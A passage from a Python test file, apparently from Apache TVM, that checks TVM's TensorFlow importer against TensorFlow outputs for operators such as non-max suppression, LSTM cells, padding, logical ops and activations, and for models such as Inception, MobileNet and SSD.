name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV5:0", "nms/NonMaxSuppressionV5:1"],
mode="vm",
)
def test_forward_nms():
"""NonMaxSuppressionV3,5"""
for _test_forward_nms in [_test_forward_nms_v3, _test_forward_nms_v5]:
_test_forward_nms((5, 4), (5,), 0.7, 0.5, 5)
_test_forward_nms((20, 4), (20,), 0.5, 0.6, 10)
_test_forward_nms((1000, 4), (1000,), 0.3, 0.7, 1000)
_test_forward_nms((2000, 4), (2000,), 0.4, 0.6, 7)
def _test_forward_combined_nms(
bx_shape,
score_shape,
iou_threshold,
score_threshold,
out_size,
total_size,
clip_boxes=False,
dtype="float32",
):
def get_random_scores(size, dtype):
size1d = np.prod(size)
scores = np.linspace(0, 1, num=size1d)
np.random.shuffle(scores)
return scores.reshape(size).astype(dtype)
boxes = np.random.uniform(-1, 2, size=bx_shape).astype(dtype)
scores = get_random_scores(score_shape, dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.combined_non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size_per_class=in_data_3,
max_total_size=total_size,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
pad_per_class=False,
clip_boxes=clip_boxes,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
[
"nms/CombinedNonMaxSuppression:0",
"nms/CombinedNonMaxSuppression:1",
"nms/CombinedNonMaxSuppression:2",
"nms/CombinedNonMaxSuppression:3",
],
)
def test_forward_combined_nms():
"""CombinedNonMaxSuppression"""
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 1), 0.7, 0.5, 64, 64)
_test_forward_combined_nms((1, 32, 1, 4), (1, 32, 1), 0.7, 0.5, 10, 64)
_test_forward_combined_nms((1, 32, 1, 4), (1, 32, 2), 0.7, 0.5, 32, 64)
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 20), 0.7, 0.5, 64, 10)
# This workload seems flaky on CI.
# See https://github.com/apache/tvm/issues/8140
# _test_forward_combined_nms((1, 64, 20, 4), (1, 64, 20), 0.7, 0.5, 64, 64, clip_boxes=True)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 1), 0.4, 0.6, 100, 100)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 10), 0.4, 0.2, 150, 1000)
#######################################################################
# LSTM
# ----
def _test_lstm_cell(batch_size, num_hidden, num_layers, forget_bias, dtype):
"""One iteration of a LSTM cell"""
tf.reset_default_graph()
input_size = num_hidden
input_data = np.full((batch_size, input_size), 1.0, dtype=dtype)
in_state_c = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
in_state_h = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
def _get_tensorflow_output():
with tf.Session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)
):
m0 = tf.placeholder(dtype, [batch_size, num_hidden], name="m0")
m1 = tf.placeholder(dtype, [batch_size, num_hidden], name="m1")
x = tf.placeholder(shape=(batch_size, input_size), dtype=dtype, name="input")
g, ((out_m0, out_m1)) = tensorflow.contrib.rnn.LSTMBlockCell(
num_hidden, forget_bias=forget_bias
)(x, (m0, m1))
sess.run([variables.global_variables_initializer()])
res = sess.run(
[g, out_m0, out_m1],
{
x.name: np.array([[1.0, 1.0]]),
m0.name: in_state_c,
m1.name: in_state_h,
},
)
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(
sess, graph_def, ["root/lstm_cell/LSTMBlockCell"]
)
return final_graph_def, res
graph_def, tf_out = _get_tensorflow_output()
tvm_output = run_tvm_graph(
graph_def,
[input_data, in_state_c, in_state_h],
["root/input", "root/m0", "root/m1"],
num_output=7,
)
assert isinstance(tvm_output, list)
tvm.testing.assert_allclose(tf_out[0], tvm_output[6], rtol=1e-3, atol=1e-3)
tvm.testing.assert_allclose(tf_out[1], tvm_output[1], rtol=1e-3, atol=1e-3)
def test_forward_lstm():
"""test LSTM block cell"""
if package_version.parse(tf.VERSION) < package_version.parse("2.0.0"):
        # tf.contrib.rnn.LSTMBlockCell was removed in TF 2.0
_test_lstm_cell(1, 2, 1, 0.5, "float32")
#######################################################################
# Pack
# ---
def _test_pack(axis, shape, **kwargs):
a = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
b = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
with tf.Graph().as_default():
tf_a = array_ops.placeholder(shape=shape, dtype="float32", name="pl_a")
tf_b = array_ops.placeholder(shape=shape, dtype="float32", name="pl_b")
tf_c = tf.stack([tf_a, tf_b], axis=axis, **kwargs)
assert tf_c.op.op_def.name == "Pack", "tf.stack() is expected to produce 'Pack' operation"
compare_tf_with_tvm([a, b], ["pl_a:0", "pl_b:0"], "stack:0")
def test_forward_pack():
for axis in range(-3, 3):
_test_pack(axis, [3, 2, 1])
for axis in range(-1, 1):
_test_pack(axis, [3])
_test_pack(0, [])
#######################################################################
# Unpack
# ------
def _test_forward_unpack(in_shape, axis, dtype):
"""test operator Unpack"""
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.unstack(in_data, axis=axis, name="Unpack")
compare_tf_with_tvm([np_data], ["in_data:0"], "Unpack:0")
def test_forward_unpack():
_test_forward_unpack((3,), 0, "int32")
_test_forward_unpack((3,), -1, "int16")
_test_forward_unpack((21, 23, 3), 2, "float32")
#######################################################################
# Range
# -----
def test_forward_range():
"""test operator Range"""
for dtype in [tf.int32, tf.int64]:
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 18, 3, name="range", dtype=dtype)
compare_tf_with_tvm([], [], "range:0")
"""test type assignment for operator Range"""
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 256 + 1, 1, dtype=tf.float32)
compare_tf_with_tvm([], [], "range:0")
#######################################################################
# Pad
# ---
def _test_pad(input_shape, paddings, mode, **kwargs):
"""One iteration of pad operation with given shape"""
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
pad_values = constant_op.constant(paddings)
pad = tf.pad(in_data, paddings=pad_values, mode=mode, **kwargs)
if mode == "CONSTANT":
if "constant_values" in kwargs:
out_name = "PadV2:0"
else:
out_name = "Pad:0"
else:
out_name = "MirrorPad:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def test_forward_pad():
"""Pad"""
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT", constant_values=1.0)
_test_pad((2, 3), [[1, 1], [2, 2]], mode="SYMMETRIC")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="REFLECT")
#######################################################################
# Logical operators
# --------------------
def test_logical_and():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_and(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_or():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_or(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_xor():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_xor(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_not():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
out = tf.logical_not(in1, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm(in_data1, "in1:0", "out:0")
def test_forward_logical():
test_logical_and()
test_logical_or()
test_logical_xor()
test_logical_not()
#######################################################################
# Where, Select, SelectV2
# -------------
def test_forward_where():
"""Where: return elements depending on conditions"""
with tf.Graph().as_default():
with tf.Session() as sess:
input1 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input1")
input2 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input2")
mask = input1 > input2
tf.where(mask, input1 + 1, input2 * 2)
in_data1 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
in_data2 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
compare_tf_with_tvm([in_data1, in_data2], ["input1:0", "input2:0"], "Select:0")
#######################################################################
# Inception V3
# ------------
@pytest.mark.skip(reason="See https://github.com/apache/tvm/issues/10275")
def test_forward_inception_v3():
"""test inception V3 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"InceptionV3/inception_v3_2016_08_28_frozen-with_shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 299, 299, 3)).astype("float32")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input:0", "InceptionV3/Predictions/Reshape_1:0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Inception V1
# ------------
def test_forward_inception_v1():
"""test inception V1 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("InceptionV1/classify_image_graph_def-with_shapes.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
# Build an image from random data.
from PIL import Image
from tvm.contrib import utils
img_array = np.random.uniform(size=(1, 600, 600, 3)).astype("uint8")
img = Image.frombuffer("RGB", (600, 600), img_array.tostring(), "raw", "RGB", 0, 1)
temp = utils.tempdir()
img_path = temp.relpath("tf-test.jpg")
img.save(img_path)
        if not tf.gfile.Exists(img_path):
            tf.logging.fatal("File does not exist %s", img_path)
        data = tf.gfile.FastGFile(img_path, "rb").read()
temp.remove()
# Extract tensorflow decoded image frame for tvm input
with tf.Session() as sess:
tvm_data = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "DecodeJpeg:0")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "softmax:0")
tvm_output = run_tvm_graph(graph_def, tvm_data, "DecodeJpeg/contents")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Mobilenet
# ---------
def test_forward_mobilenet():
"""test mobilenet model"""
# MobilenetV2
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"https://storage.googleapis.com/mobilenet_v2/checkpoints/mobilenet_v2_1.4_224.tgz",
"mobilenet_v2_1.4_224_frozen.pb",
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "MobilenetV2/Predictions/Reshape_1"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "input:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# ResnetV2
# --------
@tvm.testing.requires_gpu
def test_forward_resnetv2():
"""test resnet model"""
if is_gpu_available():
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"ResnetV2/resnet-20180601_resnet_v2_imagenet-shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(128, 224, 224, 3)).astype("float32")
out_node = "ArgMax"
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input_tensor:0", out_node + ":0")
for device in ["llvm", "cuda"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def, data, "input_tensor", len(tf_output), target=device
)
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# SSD
# ---
def _test_ssd_impl():
"""Test SSD with backbone MobileNet V1"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"object_detection/ssd_mobilenet_v1_ppn_shared_"
"box_predictor_300x300_coco14_sync_2018_07_03.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(0.0, 255.0, size=(1, 512, 512, 3)).astype("uint8")
in_node = "image_tensor"
out_node = ["detection_boxes", "detection_scores", "detection_classes"]
with tf.Session() as sess:
tf_output = run_tf_graph(
sess, data, "{}:0".format(in_node), ["{}:0".format(oname) for oname in out_node]
)
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
data,
in_node,
len(out_node),
target=device,
layout="NCHW",
out_names=out_node,
mode="vm",
disabled_pass=["FoldScaleAxis"],
serialize=True,
)
for i in range(len(out_node)):
tvm.testing.assert_allclose(tvm_output[i], tf_output[i], rtol=1e-3, atol=1e-3)
@pytest.mark.skip(
reason="Use of threading module here hides errors, see https://github.com/apache/tvm/pull/10231"
)
def test_forward_ssd():
run_thread = threading.Thread(target=_test_ssd_impl, args=())
old_stack_size = threading.stack_size(100 * 1024 * 1024)
run_thread.start()
run_thread.join()
threading.stack_size(old_stack_size)
#######################################################################
# Placeholder
# -----------
def test_forward_placeholder():
"""test a simple pb with Placeholder node in the end of GraphDef"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("Custom/placeholder.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "mul"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "Placeholder:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "Placeholder")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# PTB
# ---
try:
# Load contrib for running ptb model in tf version before 2.0
import tensorflow.contrib
except ImportError:
pass
def test_forward_ptb():
"""test ptb model"""
config = tf_testing.get_config()
num_steps = config.num_steps
num_hidden = config.hidden_size
num_layers = config.num_layers
batch_size = config.batch_size
vocab_size = config.vocab_size
out_sample_shape = (batch_size, vocab_size)
out_state_shape = (batch_size, num_hidden)
# Sample input
inpt = "we have no useful information on"
cnt_sample = 20
def _pretty_print(items, is_char_model, id2word):
if not is_char_model:
return " ".join([id2word[x] for x in items])
else:
return "".join([id2word[x] for x in items]).replace("_", " ")
def _get_tvm_graph_module(graph_def):
        # Cell inputs 'c' and 'h' consist of all layers' values
shape_dict = {"Model/Placeholder": (batch_size, num_steps)}
mod, params = relay.frontend.from_tensorflow(
graph_def,
shape=shape_dict,
outputs=[
"Model/Softmax:0",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:6",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:6",
],
)
target = "llvm"
with tvm.transform.PassContext(opt_level=0):
graph, lib, params = relay.build(mod, target, params=params)
from tvm.contrib import graph_executor
dev = tvm.cpu(0)
return params, graph_executor.create(graph, lib, dev)
def _do_tvm_sample(model, data, in_states, params, num_samples):
"""Sampled from the model"""
samples = []
state = in_states
sample = None
def _get_sample(data, state):
input_data = np.full((batch_size, num_steps), data, dtype="int32")
model.set_input("Model/Placeholder", tvm.nd.array(input_data.astype("int32")))
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros",
tvm.nd.array(state[0].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros_1",
tvm.nd.array(state[1].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros",
tvm.nd.array(state[2].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros_1",
tvm.nd.array(state[3].astype("float32")),
)
model.set_input(**params)
model.run()
tvm_output = model.get_output(0, tvm.nd.empty(out_sample_shape, "float32")).numpy()
state_output = []
for i in range(4):
state_output.append(
model.get_output(i + 1, tvm.nd.empty(out_state_shape, "float32")).numpy()
)
sample = tf_testing.pick_from_weight(tvm_output[0])
return sample, state_output
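        # Feed the seed sequence first, then keep sampling from the last predicted word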
for x in data:
sample, state = _get_sample(x, state)
if sample is not None:
samples.append(sample)
else:
samples.append(0)
k = 1
while k < num_samples:
sample, state = _get_sample(samples[-1], state)
samples.append(sample)
k += 1
return samples, state
with tf.Graph().as_default():
word_to_id, id_to_word, graph_def = tf_testing.get_workload_ptb()
vocab_size = len(word_to_id)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
sess = tf.Session()
# TVM graph module creation
params, m = _get_tvm_graph_module(graph_def)
        # Create 10 predicted statements of 20 words
cnt_stm = 0
while cnt_stm < 10:
cnt_stm += 1
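            # Zero-initialized (c, h) states, two tensors per LSTM layer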
in_state = [np.full((batch_size, num_hidden), 0, dtype="float32")] * 2 * num_layers
seed_for_sample = inpt.split()
tvm_samples, tvm_state = _do_tvm_sample(
m, [word_to_id[word] for word in seed_for_sample], in_state, params, cnt_sample
)
tvm_sample_str = _pretty_print(tvm_samples, False, id_to_word)
tf_samples, tf_state = tf_testing.do_tf_sample(
sess, [word_to_id[word] for word in seed_for_sample], in_state, cnt_sample
)
tf_sample_str = _pretty_print(tf_samples, False, id_to_word)
inpt = tvm_sample_str
tvm.testing.assert_allclose(tf_samples, tvm_samples, rtol=1e-5, atol=1e-5)
assert tvm_sample_str == tf_sample_str
#######################################################################
# LRN (Local Response Normalization)
# ----------------------------------
def _test_lrn(ishape, size, axis, bias, alpha, beta):
"""testing local response normalization"""
lrn_depth_radius = size / 2
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype, name="lrn0_data")
nn_ops.local_response_normalization(
in1, name="lrn", depth_radius=lrn_depth_radius, bias=bias, alpha=alpha, beta=beta
)
compare_tf_with_tvm(inp_array, "lrn0_data:0", "lrn:0")
def test_forward_lrn():
_test_lrn((1, 3, 20, 20), 3, 1, 1.0, 1.0, 0.5)
#######################################################################
# l2_normalize
# ------------
def _test_l2_normalize(ishape, eps, axis):
"""testing l2 normalize (uses max, sum, square, sqrt frontend operators)"""
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
nn.l2_normalize(in1, axis=axis, epsilon=eps, name=None, dim=None)
compare_tf_with_tvm(inp_array, "Placeholder:0", "l2_normalize:0")
def test_forward_l2_normalize():
_test_l2_normalize((1, 3, 20, 20), 0.001, (0,))
#######################################################################
# transpose
# ---------
def _test_forward_transpose(ishape, axes=None):
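    """One iteration of transpose with an optional permutation"""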
data = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
if axes is None:
tf.transpose(in1)
else:
tf.transpose(in1, perm=axes)
compare_tf_with_tvm(data, "transpose_data:0", "transpose:0")
def _test_forward_transpose_axes_input(ishape, axes):
data = np.random.uniform(size=ishape).astype(np.float32)
axes_np = np.array(axes).astype(np.int32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
const1 = tf.constant(axes_np, dtype=tf.int32)
# make axes an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
axes = tf.reverse(const1, axis=[-1])
tf.transpose(in1, axes)
compare_tf_with_tvm([data], ["transpose_data:0"], "transpose:0")
def test_forward_transpose():
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4))
_test_forward_transpose((7, 8, 8, 10))
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4), (0, 1, 2))
_test_forward_transpose((2, 3, 4, 5), (3, 0, 1, 2))
    _test_forward_transpose_axes_input((2, 3, 4), (1, 2, 0))
    _test_forward_transpose_axes_input((2, 3, 4, 5), (3, 0, 1, 2))
def _test_forward_slice_operation_input(input_value, begin_value, size_value):
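    """One iteration of slice with the given begin and size values"""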
input_data = np.array(input_value, dtype=np.float32)
with tf.Graph().as_default():
input_tensor = tf.placeholder(shape=input_data.shape, dtype=input_data.dtype, name="input")
tf.slice(input_tensor, begin_value, size_value, name="slice_output")
compare_tf_with_tvm([input_data], ["input:0"], "slice_output:0")
def test_forward_slice():
_test_forward_slice_operation_input([1, 1], [0], [2])
_test_forward_slice_operation_input([0, 1, 2, 3], [3], [-1])
_test_forward_slice_operation_input(
[[0, 1, 2, 3], [4, 5, 6, 7]], begin_value=[0, 1], size_value=[-1, -1]
)
def test_forward_ceil():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.ceil(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Ceil:0")
def test_forward_floor():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.floor(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Floor:0")
def test_forward_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.relu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Relu:0", mode=mode)
def test_forward_leaky_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.leaky_relu(in1, alpha=0.4)
compare_tf_with_tvm(inp_array, "Placeholder:0", "LeakyRelu:0", mode=mode)
def test_forward_elu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.elu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Elu:0")
def test_forward_selu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.selu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Selu:0")
def test_forward_tanh():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.tanh(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Tanh:0")
#######################################################################
# Softmax
# -------
def test_forward_softmax():
"""test operator Softmax"""
def check_softmax(in_shape, axis, dtype):
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.nn.softmax(in_data, axis=axis, name="Softmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "Softmax:0")
check_softmax((2, 3, 5), 2, "float32")
check_softmax((2, 3, 5), -1, "float32")
#######################################################################
# Tensor
# ------
def test_forward_round():
"""test Round"""
np_data = np.random.uniform(-10, 10, size=(5, 7)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7), name="in_data")
tf.round(in_data, name="round")
compare_tf_with_tvm([np_data], ["in_data:0"], "round:0")
def test_forward_abs():
"""test operator Abs"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.abs(in_data, name="abs")
compare_tf_with_tvm([np_data], ["in_data:0"], "abs:0")
def _test_forward_zeros_like(in_shape, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.zeros_like(in_data, name="zeros_like")
compare_tf_with_tvm([np_data], ["in_data:0"], "zeros_like:0")
def test_forward_zeros_like():
if tf.__version__ < LooseVersion("1.2"):
_test_forward_zeros_like((2, 3), "int32")
_test_forward_zeros_like((2, 3, 5), "int8")
_test_forward_zeros_like((2, 3, 5, 7), "uint16")
_test_forward_zeros_like((2, 3, 11), "float32")
_test_forward_zeros_like((2, 3, 11), "float64")
def test_forward_squared_difference():
ishape = (1, 3, 10, 14)
inp_array_a = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
inp_array_b = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array_a.shape, dtype=inp_array_a.dtype, name="in1")
in2 = tf.placeholder(shape=inp_array_b.shape, dtype=inp_array_b.dtype, name="in2")
out = tf.math.squared_difference(in1, in2)
compare_tf_with_tvm([inp_array_a, inp_array_b], [in1.name, in2.name], out.name)
def _test_forward_reverse_v2(in_shape, axis, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.reverse(in_data, axis=[axis], name="reverse")
compare_tf_with_tvm([np_data], ["in_data:0"], "reverse:0")
def test_forward_reverse_v2():
"""test ReverseV2"""
_test_forward_reverse_v2((2, 3), 0, "int32")
_test_forward_reverse_v2((2, 3, 5), 2, "float32")
_test_forward_reverse_v2((2, 3, 5, 7), 1, "float32")
_test_forward_reverse_v2((2, 3, 5), -1, "float64")
_test_forward_reverse_v2((2, 3, 5), -3, "float64")
def test_forward_sign():
"""test Sign"""
np_data = np.random.uniform(-10, 10, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sign(in_data, name="sign")
compare_tf_with_tvm([np_data], ["in_data:0"], "sign:0")
def test_forward_square():
"""test operator Square"""
np_data = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.square(in_data, name="square")
compare_tf_with_tvm([np_data], ["in_data:0"], "square:0")
def test_forward_pow_exp():
"""test Pow and Exp"""
np_in1 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
np_in2 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in1 = tf.placeholder(tf.float32, (5, 7, 11), name="in1")
in2 = tf.placeholder(tf.float32, (5, 7, 11), name="in2")
out1 = tf.pow(in1, in2, name="pow")
out = tf.exp(in1, name="exp")
compare_tf_with_tvm([np_in1, np_in2], ["in1:0", "in2:0"], "pow:0")
compare_tf_with_tvm([np_in1], ["in1:0"], "exp:0")
def test_forward_unary():
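    """test a collection of unary math operators"""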
def _test_forward_unary(op, a_min=1, a_max=5, dtype=np.float32):
"""test unary operators"""
np_data = np.random.uniform(a_min, a_max, size=(2, 3, 5)).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, (2, 3, 5), name="in_data")
out = op(in_data)
compare_tf_with_tvm([np_data], ["in_data:0"], out.name)
_test_forward_unary(tf.acos, -1, 1)
